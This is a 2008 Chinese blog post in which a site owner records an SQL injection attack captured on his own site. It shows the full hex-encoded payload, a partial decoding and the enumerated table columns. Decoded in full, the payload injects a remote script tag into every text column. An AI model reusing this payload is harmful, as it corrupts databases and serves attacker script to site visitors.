用户操作
[留言]  [发消息]  [加为好友] 
订阅我的博客
XML聚合    FeedSky
订阅到鲜果
订阅到Google
订阅到抓虾
skyjacker的公告
<script type="text/javascript"><!-- google_ad_client = "pub-3897369466460649"; google_ad_width = 160; google_ad_height = 100; google_ad_format = "160x90_0ads_al_s"; google_ad_type = "text"; google_ad_channel = ""; google_color_border = "F5F5F5"; google_color_bg = "F5F5F5"; google_color_link = "F5F5F5"; google_color_text = "eeeeee"; google_color_url = "F5F5F5"; //--></script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> <script language="javascript" type="text/javascript" src="http://js.users.51.la/780952.js"></script>
文章分类
编程技术
偶遇偶得
社科综合
学点安全
硬件知识
友情链接
Laoa's BLog
scz
下一站天后
中国网站在线
我行我素spiritchina
绿茶
风中的歌
存档

原创  抓到的一个 SQL Injection 包 收藏

最近网站一直被骚扰,只有记录一下这些无聊哥们的手段。我也学习学习。

注射串: 


221.229.160.232
/index.asp

';DECLARE @S CHAR(4000);SET @S
CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F696D6167652E706F73742E746F6D2E636F6D2F41727469636C65496D6167652F3231332F3536332F4243303030393732323030382F303731352F313231363131333235332E6A7067223E3C2F7363726970743E3C212D2D2727776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F696D6167652E706F73742E746F6D2E636F6D2F41727469636C65496D6167652F3231332F3536332F4243303030393732323030382F303731352F313231363131333235332E6A7067223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
==========GET==========

解码串:
DECLARE
  @T varchar(255),
  @C varchar(4000) DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
  OPEN Table_Cursor FETCH NEXT FROM  Tab

结果串:

spt_values name
spt_fallback_db xserver_name
spt_fallback_db name
spt_fallback_dev xserver_name
spt_fallback_dev name
spt_fallback_dev phyname
spt_fallback_usg xserver_name
spt_provider_types type_name
spt_provider_types literal_prefix
spt_provider_types literal_suffix
spt_provider_types local_type_name
spt_datatype_info_ext CREATE_PARAMS
spt_datatype_info_ext typename
MSreplication_options optname
spt_datatype_info TYPE_NAME
spt_datatype_info LITERAL_PREFIX
spt_datatype_info LITERAL_SUFFIX
spt_datatype_info CREATE_PARAMS
spt_datatype_info LOCAL_TYPE_NAME
spt_server_info attribute_name
spt_server_info attribute_value

发表于 @ 2008年07月16日 08:55:00 | 评论( loading... ) | 编辑| 举报| 收藏

旧一篇:VSS Invalid Handle 问题解决 | 新一篇:中国的iPhone girl---小错误出大名^_^WATER
查看最新精华文章 请访问博客首页相关文章
  • 发表评论
  • 评论内容:
  •  
Copyright © skyjacker
Powered by CSDN Blog